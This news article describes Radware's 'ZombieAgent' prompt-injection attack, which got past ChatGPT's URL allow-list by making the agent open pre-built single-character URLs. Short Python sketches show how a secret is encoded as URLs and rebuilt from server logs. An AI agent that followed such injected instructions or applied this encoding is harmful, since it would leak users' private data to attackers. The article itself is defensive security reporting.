ChatGPT’s Ongoing Battle: New ‘ZombieAgent’ Attack Bypasses URL Safeguards

Radware researchers uncover a method to exfiltrate data from ChatGPT, highlighting the persistent challenge of prompt injection vulnerabilities despite OpenAI's mitigations.

Scott Adams is a member of the editorial team at Nile1, contributing to the preparation and editing of news content in accordance with the site's editorial policy, based on verified sources and internal editorial review prior to publication. Published content reflects the editorial stance of the site and does not necessarily represent a personal opinion.

OpenAI implemented a strict URL policy for ChatGPT, allowing it to open only exact, pre-existing links and barring it from appending parameters. This measure successfully countered ShadowLeak, an attack that exploited the large language model's ability to construct new URLs by combining words, appending query parameters, or inserting user data.

However, Radware researchers devised ZombieAgent, a straightforward modification to the prompt injection technique. Their method involved providing a comprehensive list of pre-constructed URLs, each appending a single character—a letter (e.g., example.com/a, example.com/b) or a number (example.com/0 through example.com/9)—to a base URL. The prompt also directed the agent to replace spaces with a specific token.
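The encoding scheme described above can be sketched as follows. This is a minimal illustration of the idea, not Radware's actual proof of concept: the domain, the space token, and the character set are assumptions chosen for clarity.

```python
# Hypothetical sketch of the ZombieAgent encoding idea: one pre-built,
# allow-listed URL per character, so a secret can be spelled out as a
# sequence of otherwise-legitimate link openings.
BASE = "https://example.com/"   # assumed attacker-controlled base URL
SPACE_TOKEN = "_"               # assumed stand-in token for spaces

# The injected prompt supplies the full list of pre-constructed URLs,
# e.g. example.com/a ... example.com/z and example.com/0 ... example.com/9.
ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789" + SPACE_TOKEN
URL_FOR = {ch: BASE + ch for ch in ALPHABET}

def encode_secret(secret: str) -> list[str]:
    """Map a secret string to the sequence of single-character URLs
    the agent would be instructed to open, one request per character."""
    urls = []
    for ch in secret.lower():
        ch = SPACE_TOKEN if ch == " " else ch
        if ch in URL_FOR:        # characters outside the list are dropped
            urls.append(URL_FOR[ch])
    return urls

print(encode_secret("api key 42"))
```

Because every URL in the list is an exact, pre-constructed link, each individual request looks compliant with a policy that only forbids the model from building new URLs.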

Diagram illustrating the URL-based character exfiltration for bypassing the allow list introduced in ChatGPT in response to ShadowLeak.
Credit: Radware

ZombieAgent succeeded because OpenAI’s restrictions did not prevent the appending of a single character to a URL. This oversight enabled the attack to exfiltrate data one character at a time.
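On the attacker's side, recovering the data is then trivial: the secret is simply read back from the order of requests in the server's access log. The sketch below assumes the same hypothetical single-character paths and "_" space token as above.

```python
# Hypothetical attacker-side view: rebuilding the exfiltrated string from
# the ordered request paths recorded in the web server's access log.
def reconstruct(request_paths: list[str]) -> str:
    """Rebuild the exfiltrated string from logged paths like '/a'."""
    chars = []
    for path in request_paths:
        ch = path.rstrip("/").rsplit("/", 1)[-1]  # last segment = one char
        chars.append(" " if ch == "_" else ch)
    return "".join(chars)

log = ["/a", "/p", "/i", "/_", "/k", "/e", "/y"]
print(reconstruct(log))  # -> "api key"
```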

OpenAI has since addressed ZombieAgent by limiting ChatGPT’s ability to open links from emails. The model now only opens such links if they are listed in a public index or explicitly provided by the user within a chat prompt. This adjustment aims to prevent the agent from accessing base URLs controlled by attackers.

OpenAI’s experience reflects a common challenge in cybersecurity: the continuous cycle of mitigating an attack only for it to reappear with minor alterations. This pattern, reminiscent of persistent threats like SQL injection and memory corruption vulnerabilities, is expected to continue indefinitely, providing attackers with ongoing opportunities to compromise software and websites.

Pascal Geenens, VP of threat intelligence at Radware, emphasized that “Guardrails should not be considered fundamental solutions for the prompt injection problems.” He added, “Instead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.”
